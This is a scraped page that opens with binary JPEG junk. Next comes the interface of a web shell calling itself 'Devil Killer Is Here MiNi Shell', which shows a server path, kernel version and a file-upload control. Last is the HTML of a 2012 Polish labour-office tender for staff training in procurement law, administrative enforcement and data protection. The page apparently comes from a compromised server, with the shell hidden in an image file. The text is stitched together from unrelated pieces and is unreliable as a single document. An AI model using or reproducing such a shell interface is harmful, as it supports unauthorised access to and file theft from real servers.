JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120228/59522-N-2012.html

<p class="kh_header"><b>Wrocław: Powiatowy Urząd Pracy we Wrocławiu</b><br>
<b>Numer ogłoszenia: 59522 - 2012; data zamieszczenia: 28.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy we Wrocławiu , ul. Gliniana 20-22, 50-525 Wrocław, woj. dolnośląskie, tel. 71 7701 600, faks 71 7701 633.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> pup.wroclaw.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Powiatowy Urząd Pracy we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamknięte szkolenie pracowników Powiatowego Urzędu Pracy we Wrocławiu, obejmujące trzy zadania, z następujących tematów:
-zadanie 1: ABC zamówień publicznych; jednodniowe szkolenie dla 20 osób (1 grupa) w dniu 20 kwietnia 2012 r.
-zadanie 2: Postępowanie egzekucyjne w administracji; jednodniowe szkolenie dla 15 osób (1 grupa,) w dniu 24 kwietnia 2012 r.
-zadanie 3: Ochrona danych osobowych; dwa jednodniowe szkolenia dla 40 osób (2 grupy) w dwóch terminach: 15 maja 2012 r. oraz 17 maja 2012 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wiedzy i doświadczenia Wykonawca wykonał z należytą starannością, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odrębnie dla każdego  zadania - co najmniej 5 szkoleń grupowych, odpowiednio z zakresu określonego w opisie przedmiotu zamówienia dla danego tematu w ramach określonego zadania, z podaniem wartości przeprowadzonych szkoleń, ich przedmiotu, dat wykonania, odbiorców oraz liczby przeszkolonych osób.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie dysponowania osobami zdolnymi do wykonania zamówienia w ramach:
a) zadania 1 - dysponuje na czas realizacji zamówienia co najmniej 1 wykładowcą, który musi posiadać łącznie:
- wykształcenie wyższe prawnicze,
- doświadczenie praktyczne w prowadzeniu szkoleń grupowych z zakresu określonego w opisie przedmiotu zamówienia dla tematu w ramach zadania 1, w postaci co najmniej 5 przeprowadzonych szkoleń z tego zakresu, zrealizowanych w ciągu 12 miesięcy przed upływem terminu składania ofert,
b) zadania 2 - dysponuje na czas realizacji zamówienia co najmniej 1 wykładowcą, który musi posiadać łącznie:
- wykształcenie wyższe prawnicze lub administracyjne,
- doświadczenie praktyczne w prowadzeniu szkoleń grupowych z zakresu określonego w opisie przedmiotu zamówienia dla tematu w ramach zadania 2, w postaci co najmniej 5 przeprowadzonych szkoleń z tego zakresu, zrealizowanych w ciągu 12 miesięcy przed upływem terminu składania ofert,
c) zadania 3 - dysponuje na czas realizacji zamówienia co najmniej 1 wykładowcą, który musi posiadać łącznie:
- wykształcenie wyższe,
- doświadczenie praktyczne w prowadzeniu szkoleń grupowych z zakresu określonego w opisie przedmiotu zamówienia dla tematu w ramach zadania 3, w postaci co najmniej 5 przeprowadzonych szkoleń z tego zakresu, zrealizowanych w ciągu 12 miesięcy przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokumenty potwierdzające, że każde ze szkoleń zostało wykonane należycie (np. referencje, podziękowania, pochwały),
2. Program szkolenia, odpowiednio do tematu objętego ofertą zadania, opracowany przez Wykonawcę i uwzględniający potrzeby i oczekiwania Zamawiającego zawarte w opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ),
3. W przypadku gdy Wykonawcę w postępowaniu o udzielenie zamówienia publicznego reprezentować będzie pełnomocnik - należy do oferty załączyć pełnomocnictwo (oryginał lub kopię poświadczoną za zgodność z oryginałem przez notariusza) określające jego zakres.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalna jest zmiana, za zgodą Zamawiającego, udzielona w szczególnie uzasadnionych przypadkach (zdarzenia losowe) w odniesieniu do osób realizujących zajęcia w ramach szkolenia pod warunkiem, że osoby te będą spełniały wymagania określone w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> pup.wroclaw.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy we Wrocławiu, ul. Gliniana 20-22, 50-525 Wrocław, V piętro - pokój 506.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2012 godzina 10:15, miejsce: Powiatowy Urząd Pracy we Wrocławiu, ul. Gliniana 20-22, 50-525 Wrocław, parter - pokój 04 (kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ABC zamówień publicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje jednodniowe zamknięte szkolenie pracowników Powiatowego Urzędu Pracy we Wrocławiu z tematu: ABC zamówień publicznych - 20 osób (1 grupa). 
Wymagane minimum programowe:
Wykonawca opracuje szczegółowy program szkolenia, który uwzględni aktualne potrzeby  i oczekiwania Zamawiającego w zakresie będącym przedmiotem zamówienia oraz odpowiednią ilość czasu przypadającą na poszczególne zagadnienia w ramach realizowanego programu. Zakres merytoryczny danego szkolenia powinien być dostosowany do specyfiki funkcjonowania Powiatowego Urzędu Pracy i uwzględniać przykłady przedstawiane przez uczestników szkolenia. 
Opis zadania 1: 
Zamawiający wymaga, aby Wykonawca zrealizował w trakcie szkolenia w ramach opracowanego przez siebie programu następujące zagadnienia:
1. zakres przedmiotowy stosowania ustawy - Prawo zamówień publicznych;
2. wyłączenie stosowania ustawy - Prawo zamówień publicznych;
3. zasady udzielania zamówień publicznych;
4. usługi niepriorytetowe, ze szczególnym uwzględnieniem szkoleń bezrobotnych        i pracowników;
5. przygotowanie postępowania o udzielenie zamówienia publicznego:
- opis przedmiotu zamówienia,
- określenie wartości szacunkowej zamówienia i dzielenie zamówienia na części,
- specyfikacja istotnych warunków zamówienia,
- ogłoszenie;
6. tryby postępowania o udzielenie zamówienia publicznego - ogólna charakterystyka;
7. przetarg nieograniczony;
8. Wykonawca w postępowaniu o udzielenie zamówienia publicznego:
- warunki podmiotowe udziału w postępowaniu i dokumenty potwierdzające ich spełnianie,
- uzupełnianie dokumentów,
- wykluczenie Wykonawcy z postępowania,
- korzystanie z cudzego zasobu przy wykonaniu zamówienia, 
- Wykonawcy wspólnie ubiegający się o udzielenie zamówienia;
9. wybór najkorzystniejszej oferty:
- kryteria oceny ofert,
- rażąco niska cena,
- odrzucenie oferty,
- oczywiste omyłki pisarskie i omyłki rachunkowe;
10. unieważnienie postępowania o udzielenie zamówienia publicznego;
11. umowa o zamówienie publiczne:
- termin zawarcia i okres na jaki można zawrzeć umowę,
- zmiany umowy,
- odstąpienie od umowy,
- unieważnienie umowy;
12. Odwołanie - podmioty uprawnione do wnoszenia, termin wniesienia, zawiadomienie Zamawiającego o wniesieniu odwołania,
13. odpowiedzialność za naruszenie przepisów ustawy - Prawo zamówień publicznych;
14. studium przypadków na podstawie przykładów z orzecznictwa oraz przykładów przedstawionych przez uczestników. 
Szkolenie ma się odbyć dla grupy 20 osób, w dniu 20 kwietnia 2012 r., w godzinach: 8.00-15.00, w siedzibie Zamawiającego: Wrocław, ul. Gliniana  20-22.
Wykonawca zapewnia przybory piśmiennicze oraz materiały dydaktyczne niezbędne do prawidłowej realizacji programu szkolenia.
Wykonawca ma obowiązek wydać uczestnikom po zakończeniu szkolenia zaświadczenia ukończenia szkolenia, zgodne z rozporządzeniem Ministra Edukacji i Nauki w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych z dnia 3 lutego 2006 r. (Dz. U. Nr 31, poz. 216) oraz sporządzić i przekazać Zamawiającemu poświadczone za zgodność z oryginałem kserokopie tych zaświadczeń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 20.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Postępowanie egzekucyjne  w administracji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje jednodniowe zamknięte szkolenie pracowników Powiatowego Urzędu Pracy we Wrocławiu z tematu: Postępowanie egzekucyjne w administracji - 15 osób (1 grupa).
Wymagane minimum programowe:
Wykonawca opracuje szczegółowy program szkolenia, który uwzględni aktualne potrzeby  i oczekiwania Zamawiającego w zakresie będącym przedmiotem zamówienia oraz odpowiednią ilość czasu przypadającą na poszczególne zagadnienia w ramach realizowanego programu. Zakres merytoryczny danego szkolenia powinien być dostosowany do specyfiki funkcjonowania Powiatowego Urzędu Pracy i uwzględniać przykłady przedstawiane przez uczestników szkolenia. 
Opis zadania 2:
Zamawiający wymaga, aby Wykonawca zrealizował w trakcie szkolenia w ramach opracowanego przez siebie programu następujące zagadnienia:
1. przepisy ustawy o finansach publicznych a egzekucja administracyjna;
2. przedawnienie należności publicznoprawnych w świetle przepisów ustawy o finansach publicznych;
3. ulgi w spłacie zobowiązań publicznoprawnych (umorzenie, odroczenie, rozłożenie na raty) i ich wpływ na egzekucję administracyjną;
4. podstawy prawne egzekucji administracyjnej - ich istnienie, ważność, prawidłowość i wykonalność (decyzja, postanowienie, deklaracja, zgłoszenie, orzeczenie, przepis prawa);
5. wierzyciel obowiązków o charakterze pieniężnym i niepieniężnym oraz jego pozycja prawna;
6. zobowiązany a odpowiedzialny (reprezentacja, pełnomocnictwo, przedstawicielstwo);
7. organ egzekucyjny;
8. upomnienie i zasada zagrożenia;
9. tytuł wykonawczy - jego elementy i prawidłowość wypełniania;
10. zarzut i zażalenie w postępowaniu egzekucyjnym;
11. skarga na czynności egzekucyjne i przewlekłość postępowania egzekucyjnego;
12. zwolnienie zajętego składnika majątkowego;
13. zawieszenie i umorzenie postępowania egzekucyjnego;
14. zbieg egzekucji administracyjnej i sądowej oraz dwóch egzekucji administracyjnych;
15. koszty egzekucyjne (składniki kosztów, odpowiedzialność za koszty, umorzenie kosztów);
16. grzywna w celu przymuszenia;
17. wykonanie zastępcze;
18. odpowiednie stosowanie przepisów postępowania administracyjnego i przepisów Ordynacji podatkowej;
19. studium przypadków na podstawie przykładów z orzecznictwa oraz przykładów przedstawionych przez uczestników. 
Szkolenie ma się odbyć dla grupy 15 osób, w dniu 24 kwietnia 2012 r.,  w godzinach: 8.00-15.00, w siedzibie Zamawiającego: Wrocław, ul. Gliniana  20-22.
Wykonawca zapewnia przybory piśmiennicze oraz materiały dydaktyczne niezbędne do prawidłowej realizacji programu szkolenia.
Wykonawca ma obowiązek wydać uczestnikom po zakończeniu szkolenia zaświadczenia ukończenia szkolenia, zgodne z rozporządzeniem Ministra Edukacji i Nauki w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych z dnia 3 lutego 2006 r. (Dz. U. Nr 31, poz. 216) oraz sporządzić i przekazać Zamawiającemu poświadczone za zgodność z oryginałem kserokopie tych zaświadczeń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 24.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ochrona danych osobowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dwa jednodniowe zamknięte szkolenia pracowników Powiatowego Urzędu Pracy we Wrocławiu z tematu: Ochrona danych osobowych - 40 osób (2 grupy po 20 osób).
Celem szkolenia jest podniesienie kwalifikacji pracowników Zamawiającego ułatwiających sprawne realizowanie zadań oraz pogłębienie i utrwalenie wiedzy w zakresie będącym przedmiotem niniejszego zamówienia.
Wymagane minimum programowe:
Wykonawca opracuje szczegółowy program szkolenia, który uwzględni aktualne potrzeby  i oczekiwania Zamawiającego w zakresie będącym przedmiotem zamówienia oraz odpowiednią ilość czasu przypadającą na poszczególne zagadnienia w ramach realizowanego programu. Zakres merytoryczny danego szkolenia powinien być dostosowany do specyfiki funkcjonowania Powiatowego Urzędu Pracy i uwzględniać przykłady przedstawiane przez uczestników szkolenia. 
Opis zadania 3:
Zamawiający wymaga, aby Wykonawca zrealizował w trakcie szkolenia w ramach opracowanego przez siebie programu następujące zagadnienia:
1. podstawy prawne ochrony danych osobowych w odniesieniu do PUP;
2. podstawowe pojęcia i definicje dotyczące ochrony danych osobowych w PUP;
- dane osobowe  (definicja, zakres przedmiotowy i podmiotowy, pojęcie zbioru danych),
- odbiorca danych,
- dane zwykłe i sensytywne (wrażliwe),
- rodzaje zbiorów danych prowadzonych w PUP,
- dane osobowe a informacje niejawne,
- ochrona danych osobowych, a prawo do informacji publicznej;
3. charakterystyka, prawne podstawy oraz zasady przetwarzania danych osobowych w praktyce PUP, z uwzględnieniem przepisów o promocji zatrudnienia i instytucjach rynku pracy oraz przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, w tym:
- zasady przetwarzania danych osobowych wraz z przykładami możliwych naruszeń,
- przesłanki dopuszczalności  przetwarzania danych osobowych,
- zakaz przetwarzania danych osobowych, a ustawa o promocji zatrudnienia            i instytucjach rynku pracy,
- obowiązki informacyjne,
- udostępnianie danych osobowych innym podmiotom w praktyce PUP, w tym drogą elektroniczną,
- powierzenie przetwarzania danych osobowych podmiotom trzecim,
- prawa osób, których dane osobowe dotyczą,
- błędy popełniane przy przetwarzaniu danych osobowych - jak ich unikać, dobre praktyki;
4. obowiązek zabezpieczenia przetwarzania danych osobowych w praktyce PUP:
- rejestracja zbiorów danych (aktualizacja oraz zwolnienia z rejestracji) - wypełnianie formularzy (przykłady),
- zabezpieczenie zbiorów danych osobowych prowadzonych w systemach tradycyjnych (ręcznych) oraz w systemach informatycznych - dobre praktyki         w tym zakresie dedykowane PUP,
- status i obowiązki Administratora Danych Osobowych oraz Administratora Bezpieczeństwa Informacji w strukturze ochrony danych osobowych w PUP,
- obowiązki osób upoważnionych do  przetwarzania danych osobowych,
- wymagana dokumentacja - w tym, w szczególności Polityka Bezpieczeństwa oraz wszelkiego rodzaju instrukcje,
- poziomy bezpieczeństwa danych osobowych, ze szczególnym uwzględnieniem systemu informatycznego;
5. odpowiedzialność za naruszenie przepisów ustawy o ochronie danych osobowych:
- odpowiedzialność dyscyplinarna, 
- odpowiedzialność karna, 
- odpowiedzialność cywilna;
6. studium przypadków na podstawie przykładów z orzecznictwa oraz przykładów przedstawionych przez uczestników.
Szkolenie ma się odbyć w terminach: 15 maja 2012 r. oraz 17 maja 2012 r., każdorazowo w godzinach: 8.00-15.00, dla grup po 20 osób każdego dnia, w siedzibie Zamawiającego: Wrocław, ul. Gliniana 20-22.
Wykonawca zapewnia przybory piśmiennicze oraz materiały dydaktyczne niezbędne do prawidłowej realizacji programu szkolenia.
